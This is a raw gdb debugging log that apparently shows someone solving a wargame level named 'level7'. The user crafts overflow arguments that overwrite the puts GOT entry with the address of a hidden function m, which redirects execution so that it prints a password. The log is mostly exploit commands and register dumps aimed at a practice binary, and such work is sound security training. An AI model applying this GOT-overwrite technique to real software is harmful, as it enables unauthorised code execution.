(gdb) r "`echo -ne "AAAABBBBCCCCDDDDEEEEFFFF"`" "11112222"
Starting program: /home/user/level7/level7 "`echo -ne "AAAABBBBCCCCDDDDEEEEFFFF"`" "11112222"

Program received signal SIGSEGV, Segmentation fault.
0xb7eb8f92 in ?? () from /lib/i386-linux-gnu/libc.so.6
(gdb) backtrace
(gdb) i r
eax            0x31313131       825307441
ecx            0xbffff907       -1073743609
edx            0x46464646       1179010630
ebx            0xb7fd0ff4       -1208152076
esp            0xbffff6ec       0xbffff6ec
ebp            0xbffff718       0xbffff718
esi            0x0      0
edi            0x0      0
eip            0xb7eb8f92       0xb7eb8f92
eflags         0x210246 [ PF ZF IF RF ID ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) x 0x8049928
0x8049928 <puts@got.plt>:        "\006\204\004\b\026\204\004\b\340S\344\267\066\204\004\b"
(gdb) r "`echo -ne "AAAABBBBCCCCDDDDEEEE\x28\x99\x04\x08"`" "11112222"
Starting program: /home/user/level7/level7 "`echo -ne "AAAABBBBCCCCDDDDEEEE\x28\x99\x04\x08"`" "11112222"

Breakpoint 1, 0x080485d3 in main ()
(gdb) set {char [10]} 0x80486eb = "/tmp/pass"
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x31313131 in ?? ()
(gdb) i r
eax            0x8049960        134519136
ecx            0xb7fda009       -1208115191
edx            0x804a0e0        134521056
ebx            0xb7fd0ff4       -1208152076
esp            0xbffff6ec       0xbffff6ec
ebp            0xbffff718       0xbffff718
esi            0x0      0
edi            0x0      0
eip            0x31313131       0x31313131
eflags         0x210282 [ SF IF RF ID ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) x m
0x80484f4 <m>:   "U\211\345\203\354\030\307\004$"
(gdb) r "`echo -ne "AAAABBBBCCCCDDDDEEEE\x28\x99\x04\x08"`" "`echo -ne "\xf4\x84\x04\x08"` "
Starting program: /home/user/level7/level7 "`echo -ne "AAAABBBBCCCCDDDDEEEE\x28\x99\x04\x08"`" "`echo -ne "\xf4\x84\x04\x08"` "

Breakpoint 1, 0x080485d3 in main ()
(gdb) set {char [10]} 0x80486eb = "/tmp/pass"
(gdb) c
Continuing.
password
 - 1550940068